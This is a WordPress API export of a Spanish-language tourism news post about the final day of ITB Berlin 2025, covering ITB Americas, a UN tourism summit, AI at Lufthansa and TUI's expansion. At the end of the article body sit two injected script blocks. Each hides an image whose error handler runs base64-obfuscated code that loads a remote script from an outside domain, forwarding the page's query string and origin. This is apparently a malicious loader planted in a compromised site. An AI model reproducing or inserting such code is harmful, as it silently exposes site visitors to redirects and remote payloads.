{"id":4906,"date":"2025-03-06T11:27:18","date_gmt":"2025-03-06T14:27:18","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4906"},"modified":"2025-08-13T23:39:23","modified_gmt":"2025-08-14T02:39:23","slug":"itb-berlin-2025-oportunidad-para-hacer-networking-innovar-y-conocer-al-evento-del-turismo-global","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4906","title":{"rendered":"ITB Berl\u00edn 2025: Oportunidad para hacer networking, innovar y conocer al evento del turismo global"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-7d1a3db9b54b504529c83e1b10940574\" style=\"background-color:#1f2c33\"><strong><em>El \u00faltimo d\u00eda de la ITB Berl\u00edn 2025 ha comenzado y, una vez m\u00e1s, los visitantes profesionales de todo el mundo se re\u00fanen con m\u00e1s de 5.800 expositores de m\u00e1s de 170 pa\u00edses<\/em><\/strong><\/h4>\n\n\n\n<p>Los dos \u00faltimos d\u00edas han sido una jornada intensa de networking y hoy el sector se re\u00fane por \u00faltima vez en la principal feria de viajes del mundo para establecer contactos valiosos en pabellones de exposici\u00f3n completamente llenos y dar forma al futuro del sector. Bajo el lema \u00abEl poder de la transici\u00f3n vive aqu\u00ed\u00bb, conferenciantes de alto nivel volver\u00e1n a subirse al escenario de la Convenci\u00f3n de la ITB de Berl\u00edn. El jueves de la ITB habr\u00e1 interesantes conferencias de prensa de expositores y una variedad de eventos.<\/p>\n\n\n\n<p>Reuni\u00f3n matutina de informaci\u00f3n sobre la ITB de Berl\u00edn con David Ruetz<\/p>\n\n\n\n<p>David Ruetz, vicepresidente senior de Messe Berlin, repasa los aspectos m\u00e1s destacados de la ITB Berl\u00edn y analiza el \u00faltimo d\u00eda de la feria. Habla de la presencia \u00fanica de Albania y del gran inter\u00e9s que despierta la inauguraci\u00f3n de la ITB Am\u00e9ricas. De cara al futuro, David revela los aspectos m\u00e1s destacados previstos para el 60\u00ba aniversario de la ITB Berl\u00edn en 2026.&nbsp;<\/p>\n\n\n\n<p>NOTICIAS Y PERSPECTIVAS<\/p>\n\n\n\n<p>ITB Am\u00e9ricas: la nueva feria de turismo B2B para todo el continente americano se lanzar\u00e1 en M\u00e9xico en 2026<br>La ITB sigue creciendo: del 10 al 12 de noviembre de 2026, la ITB Am\u00e9ricas celebrar\u00e1 su debut como feria de turismo B2B en Guadalajara, M\u00e9xico. As\u00ed lo anunci\u00f3 Messe Berlin en una conferencia de prensa en la ITB Berl\u00edn.<\/p>\n\n\n\n<p>Cumbre de la ONU sobre el Turismo: Ministros de todo el mundo debaten sobre el futuro del turismo<br>En la Cumbre de Ministros de Turismo de la ONU celebrada en la ITB de Berl\u00edn, los ministros de turismo de muchos pa\u00edses de todo el mundo debatieron sobre la interrelaci\u00f3n entre el turismo y la paz, una relaci\u00f3n que depende mutuamente y es inconcebible el uno sin el otro. Los participantes de pa\u00edses de Europa, Asia y \u00c1frica destacaron el valor de los viajes para el entendimiento entre las personas.<\/p>\n\n\n\n<p>De la reserva mediante chatbot a la optimizaci\u00f3n de procesos: la IA est\u00e1 en auge<br>El 60 por ciento de los clientes de Lufthansa prefiere reservar de forma tradicional a trav\u00e9s del sistema de b\u00fasqueda de la p\u00e1gina web, pero el proceso est\u00e1 cambiando. \u00abTodo el ecosistema de viajes est\u00e1 experimentando una aut\u00e9ntica transformaci\u00f3n\u00bb, explica el Dr. Olaf Backofen, de Lufthansa. Seg\u00fan Backofen, su grupo empresarial ya utiliza con \u00e9xito la IA para generar newsletters y contenidos.<\/p>\n\n\n\n<p>TUI aspira a seguir creciendo y se ve bien posicionada para el futuro<br>TUI est\u00e1 planeando una mayor expansi\u00f3n, con el objetivo de aumentar tanto su cartera de hoteles como su gama de tours y experiencias. Adem\u00e1s de hoteles, aviones, cruceros y paquetes vacacionales, la empresa se centra cada vez m\u00e1s en su mercado de productos seleccionados, conocido actualmente como Tuimusment. Esta plataforma ya ofrece una variedad de actividades para reservar y, en el futuro, tambi\u00e9n podr\u00eda permitir a los clientes comprar entradas para eventos o reservar una mesa en un restaurante de su ciudad natal.<\/p>\n\n\n\n<p>Fuente: ITB Berlin.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El \u00faltimo d\u00eda de la ITB Berl\u00edn 2025 ha comenzado y, una vez m\u00e1s, los visitantes profesionales de todo el mundo se re\u00fanen con m\u00e1s de 5.800 expositores de m\u00e1s de 170 pa\u00edses Los dos \u00faltimos d\u00edas han sido una jornada intensa de networking y hoy el sector se re\u00fane por \u00faltima vez en la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16,22],"tags":[],"class_list":{"0":"post-4906","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-ferias-y-congresos","7":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4906"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4906"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4906\/revisions"}],"predecessor-version":[{"id":6556,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4906\/revisions\/6556"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4906"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4906"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4906"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}